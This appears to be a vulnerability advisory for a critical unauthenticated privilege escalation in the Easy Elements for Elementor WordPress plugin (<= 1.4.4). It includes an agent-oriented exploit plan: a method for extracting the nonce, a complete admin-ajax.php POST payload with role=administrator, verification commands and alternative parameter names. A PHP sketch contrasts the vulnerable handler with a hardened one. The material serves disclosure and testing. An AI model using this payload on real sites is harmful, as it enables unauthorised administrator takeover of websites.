CVE-2026-7284

Easy Elements for Elementor <= 1.4.4 - Unauthenticated Privilege Escalation via easyel_handle_register

Severity: critical
Weakness type: Improper Privilege Management
CVSS Score: 9.8
Patched in: 1.4.5
Time to patch: 1d

Description

The Easy Elements for Elementor – Addons & Website Templates plugin for WordPress is vulnerable to privilege escalation via user registration in all versions up to, and including, 1.4.4. This is due to the 'easyel_handle_register' function not restricting what user roles a user can register with. This makes it possible for unauthenticated attackers to supply the 'administrator' role during registration and gain administrator access to the site.

CVSS Vector Breakdown

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Attack Vector: Network
Attack Complexity: Low
Privileges Required: None
User Interaction: None
Scope: Unchanged
Confidentiality: High
Integrity: High
Availability: High

Technical Details

Affected versions: <= 1.4.4
Published: May 19, 2026
Last updated: May 20, 2026
Affected plugin: easy-elements

What Changed in the Fix

Changes introduced in v1.4.5


Source Code: WordPress.org SVN

Research Plan (Unverified)


This research plan outlines the steps to verify the Critical Privilege Escalation vulnerability in the Easy Elements for Elementor plugin (<= 1.4.4).

1. Vulnerability Summary

The vulnerability exists within the easyel_handle_register function (likely an AJAX handler). The function is responsible for processing user registrations via a plugin-provided widget or form. The flaw is a lack of server-side validation or restriction on the role parameter. By default, WordPress registration should assign the role defined in "Settings > General" (usually subscriber), but this function allows the client to specify the role, enabling unauthenticated users to register as an administrator.

2. Attack Vector Analysis

  • Endpoint: wp-admin/admin-ajax.php
  • Action: easyel_handle_register (Registered for unauthenticated users via wp_ajax_nopriv_easyel_handle_register).
  • Vulnerable Parameter: role (or potentially a nested array key).
  • Preconditions:
    • The plugin must be active.
    • WordPress "Anyone can register" setting may need to be enabled (though the plugin might bypass this check).
    • A valid AJAX nonce for the registration action is required.

3. Code Flow (Inferred)

  1. An unauthenticated user sends a POST request to admin-ajax.php with action=easyel_handle_register.
  2. The easyel_handle_register function is invoked.
  3. The function extracts user details from $_POST (e.g., user_login, user_email, password, and role).
  4. The function calls wp_insert_user($userdata) where $userdata['role'] is directly populated from the role parameter without being checked against a whitelist.
  5. The user is created with the administrator role.
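As an added example (not the plugin's own code; the vulnerable half is only the shape inferred above), a PHP sketch of such a handler next to a hardened version. The nonce action name easyel_register and the request field names are assumptions.

```php
<?php
// Added example, not the plugin's code: the inferred vulnerable shape next to a hardened
// handler. The nonce action 'easyel_register' and the field names are assumptions.
// Inferred vulnerable shape: the client-supplied 'role' flows straight into wp_insert_user().
function easyel_handle_register_inferred_vulnerable() {
    $userdata = array(
        'user_login' => sanitize_user( wp_unslash( $_POST['user_login'] ?? '' ) ),
        'user_email' => sanitize_email( wp_unslash( $_POST['user_email'] ?? '' ) ),
        'user_pass'  => (string) ( $_POST['user_password'] ?? '' ),
        'role'       => sanitize_text_field( wp_unslash( $_POST['role'] ?? '' ) ), // attacker-controlled
    );
    wp_send_json_success( array( 'user_id' => wp_insert_user( $userdata ) ) );
}

// Hardened handler: nonce check, honour the site registration setting, never trust a requested role.
function easyel_handle_register_hardened() {
    // Dies with HTTP 403 unless the nonce printed alongside the form is present and valid.
    check_ajax_referer( 'easyel_register', 'security' );

    if ( ! get_option( 'users_can_register' ) ) {
        wp_send_json_error( array( 'message' => 'Registration is disabled.' ), 403 );
    }

    $login = sanitize_user( wp_unslash( $_POST['user_login'] ?? '' ), true );
    $email = sanitize_email( wp_unslash( $_POST['user_email'] ?? '' ) );
    $pass  = (string) ( $_POST['user_password'] ?? '' );
    if ( '' === $login || ! is_email( $email ) || strlen( $pass ) < 12 ) {
        wp_send_json_error( array( 'message' => 'Invalid registration data.' ), 400 );
    }

    // Decide the role server-side: take the site default but clamp it to an allow-list of
    // non-privileged roles, so any 'role' field in the request is simply ignored.
    $allowed_roles = array( 'subscriber' );
    $role          = get_option( 'default_role', 'subscriber' );
    if ( ! in_array( $role, $allowed_roles, true ) ) {
        $role = 'subscriber';
    }

    $user_id = wp_insert_user( array(
        'user_login' => $login,
        'user_email' => $email,
        'user_pass'  => $pass,
        'role'       => $role,
    ) );
    if ( is_wp_error( $user_id ) ) {
        wp_send_json_error( array( 'message' => $user_id->get_error_message() ), 400 );
    }
    wp_send_json_success( array( 'user_id' => $user_id ) );
}
add_action( 'wp_ajax_nopriv_easyel_handle_register', 'easyel_handle_register_hardened' );
```

The key difference is that the hardened handler never reads a role from the request at all, so there is no parameter name to guess; the allow-list additionally guards against a tampered default_role option.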

4. Nonce Acquisition Strategy

The registration function likely requires a nonce for security. Since this is an unauthenticated action, the nonce must be exposed on a public-facing page where the registration widget is used.

  1. Identify the Trigger: The registration functionality is typically part of a "User Registration" Elementor widget.
  2. Create a Target Page:
    • wp post create --post_type=page --post_status=publish --post_title="Register" --post_content='[easyel_registration_form]' (Note: [easyel_registration_form] is an inferred shortcode; if it's an Elementor widget, the agent should create a page and use the Elementor editor or find an existing registration page).
  3. Extract the Nonce:
    • Navigate to the page using browser_navigate.
    • Search the HTML for localized data. Based on Admin_Settings.php, nonces are often stored in an object like easyElementsData.
    • Inferred JS Key: window.easyel_registration_data?.nonce or similar.
    • Execution: browser_eval("window.easyElementsData?.nonce || window.easyel_localize?.nonce").

5. Exploitation Strategy

The agent will attempt to register a new administrator via a direct AJAX request.

  • Tool: http_request
  • Method: POST
  • URL: {{BASE_URL}}/wp-admin/admin-ajax.php
  • Headers: Content-Type: application/x-www-form-urlencoded
  • Payload:
    action=easyel_handle_register&
    user_login=hacker_admin&
    user_email=hacker@example.com&
    user_password=Password123!&
    confirm_password=Password123!&
    role=administrator&
    security={{NONCE}}
    
    (Note: Parameter names like user_password and security are inferred from common WordPress registration patterns and the easyel_save_user_data_callback found in Admin_Settings.php which uses security for its nonce check.)

6. Test Data Setup

  1. Install/Activate Plugin: Ensure easy-elements version 1.4.4 is installed.
  2. Plugin Settings: Ensure the Registration feature is enabled if there is a global toggle in the plugin dashboard.
  3. WP Settings: Run wp option update users_can_register 1.
  4. Registration Page: Create a page that includes the Easy Elements registration form to facilitate nonce extraction.

7. Expected Results

  • Successful Exploit: The server returns a JSON success message (e.g., {"success":true,"data":{...}}).
  • Failure: The server returns 403 Forbidden (nonce fail) or 400 Bad Request (missing action), or creates a user with the subscriber role instead of administrator.

8. Verification Steps

After the HTTP request, use WP-CLI to verify the privilege escalation:

  1. Check User Existence: wp user list --field=user_login (Should see hacker_admin).
  2. Check User Role: wp user get hacker_admin --field=roles (Should return administrator).

9. Alternative Approaches

If role is not the correct parameter name, check for:

  • user_role
  • userdata[role]
  • settings[role] (Mapping from the easyel_save_user_data_callback pattern seen in the source).

If the easyel_handle_register action is not found, search the plugin directory for the string wp_ajax_nopriv_ to identify the correct registration action name:
grep -r "wp_ajax_nopriv_" wp-content/plugins/easy-elements/
